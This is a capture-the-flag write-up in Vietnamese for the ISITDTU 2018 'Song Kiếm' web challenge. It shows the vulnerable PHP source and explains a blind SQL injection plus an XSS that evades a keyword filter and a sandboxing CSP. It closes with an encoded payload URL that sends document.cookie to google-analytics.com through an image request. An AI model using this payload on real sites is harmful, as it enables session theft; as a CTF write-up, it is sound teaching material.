Song Kiếm (ISITDTU Final 2018)

source:
index.php~

  Song Đao Bão Táp

  <img src="image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="mce-object" width="20" height="20" alt="" title="" />
  <img src="image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="mce-object" width="20" height="20" alt="" title="" />
  <img src="image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class="mce-object" width="20" height="20" alt="" title="" />

<?php

include "config.php";
function mysqli_filter($query)
{
	$blacklists = ["union","length","substr"];
	foreach($blacklists as $blacklist)
	{
		while(strpos($query,$blacklist)!==false)
		{
			$query = str_replace($blacklist,"",$query);
		}
	}
	return $query;
}
if(isset($_GET['id']) && !empty($_GET['id']))
{
	$id = mysqli_filter($_GET['id']);
	$sql = "select * from skill where id=".$id;
	$result = mysqli_query($conn,$sql);
	if (@mysqli_num_rows($result) === 1) {
		$row = mysqli_fetch_assoc($result);
        $skillselect = "
<tr>
<td>".$row['id']."</td>
<td>".$row['name']."</td>
<td>".$row['type']."</td>
<td>".$row['cooldown']."</td>
<td>".$row['power']."</td>
</tr>
";
	}
	else
	{
		$skillselect = "
<tr>
<td>Id: <strong>".$id."</strong> Error</td>
</tr>
";
	}
}
else
{
	$skillselect = mysqli_select_all($conn);
}

if(isset($_POST['url']) &amp;&amp; !empty($_POST['url']))
{
	$url = safe_url($_POST['url']);
	$url = escapeshellarg($url);
	// bot check
	chromheadlesscheck($url);
}

?&gt;
<div class="container">
<div class="jumbotron">
<h1>Bí kíp Nguyệt Tộc</h1>
Để lấy được Bí kíp nguyệt tộc, Ryomar và Airi hợp tác đánh bại maloch. Tuy nhiên sau khi lấy được kho báu, cả hai đã bị nakroth sát hại. Trước khi chết, cả hai tách cuốn bí kíp thành 2 mảnh và truyền cho thế hệ sau. Cách đây không lâu, có một người đã tìm thấy bí kíp và quyết định đem giấu vào một nơi khác đồng thời bảo vệ kho báu bằng một tấm chắn chỉ cho phép gia đình và người thân có thể lấy được nó.</div>
<img src="images/ngau.jpg" width="800" height="300">
<h3>Dưới đây là những chiêu thức thất truyền từ cuốn bí kíp:</h3>
<table class="table">
<thead>
<tr>
<th>ID</th>
<th>SKILLNAME</th>
<th>TYPE</th>
<th>COOLDOWN</th>
<th>POWER</th>
</tr>
</thead>
<tbody></tbody>
</table>
<h4>Airi Chrome Bot ( Truyền nhân của airi, nơi lưu giữ một nửa của cuốn bí kíp )</h4>
<div class="form-group">
      URL:
<div class="col-sm-10"></div>
</div>
<div class="form-group">
<div class="col-sm-offset-2 col-sm-10">
        Submit</div>
</div>
</div>

Đọc source, ta thấy những điểm nhấn:
1. SQL Injection, blind để lấy nửa đầu của flag
2. XSS
2.1 Bot là chrome headless -> phải bypass X-XSS-Protection
2.2 Object.freeze(document.location) -> không thể leak cookie bằng con đường location
2.3 Kiểm tra header có

 CSP:"""Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; sandbox allow-scripts allow-same-origin allow-forms; img-src 'self' https://www.google-analytics.com;"""

2.3.1 có sandbox suy ra không thể đưa payload ra ngoài bằng XHR hay Postdata
2.3.2 google-analytics được chấp nhận
Khai thác:
1. SQL Injection > quá dễ
2. XSS
2.1 bypass X-XSS-Protection
Trong source có đoạn replace những kí tự union, length, substr, tận dụng nó để làm cho chrome auditor không phát hiện được XSS,mấy bạn thích dùng cái nào cũng được, mình dùng

document.write("songkiem")

*Notes: đừng thủ alert, confirm, bla… không được đâu, vì CSP đang dùng sandbox
2.2 Object.freeze(document.location) > bỏ ý định redirect lấy cookie đi
2.3

 CSP: :"""Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; sandbox allow-scripts allow-same-origin allow-forms; img-src 'self' https://www.google-analytics.com;""" 

2.3.1 chỉ đơn giản là không dùng XHR, Postdata
2.3.2 Tạo một tag image rồi đưa payload vào image từ một tính năng của google analytic (tham khảo: https://githubengineering.com/githubs-post-csp-journey/)
*Notes: Nếu bạn không chắc browser nó sẽ encode URL như nào thì hãy dùng backtick cho dễ

Thử lấy cookie của mình:

http://35.231.54.0/60e10658bcb036f675fe033fe0376d5f/index.php?id=%3Cscrunionipt%3Ea=atob('eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpbWcnKTt4LnNyYz0naHR0cHM6Ly93d3cuZ29vZ2xl\nLWFuYWx5dGljcy5jb20vY29sbGVjdD92PTEmdGlkPVVBLTEyMjMxMjY2MS0xJmNpZD0xMjIzMTI2\nNjEmdD1ldmVudCZlYz1lbWFpbCZlYT10ZXN0bGEnK01hdGgucmFuZG9tKCkrZG9jdW1lbnQuY29v\na2llO2RvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoJ2JvZHknKS5hcHBlbmQoeCk7');eval(a)%3C/scrunionipt%3E

Gửi cho bot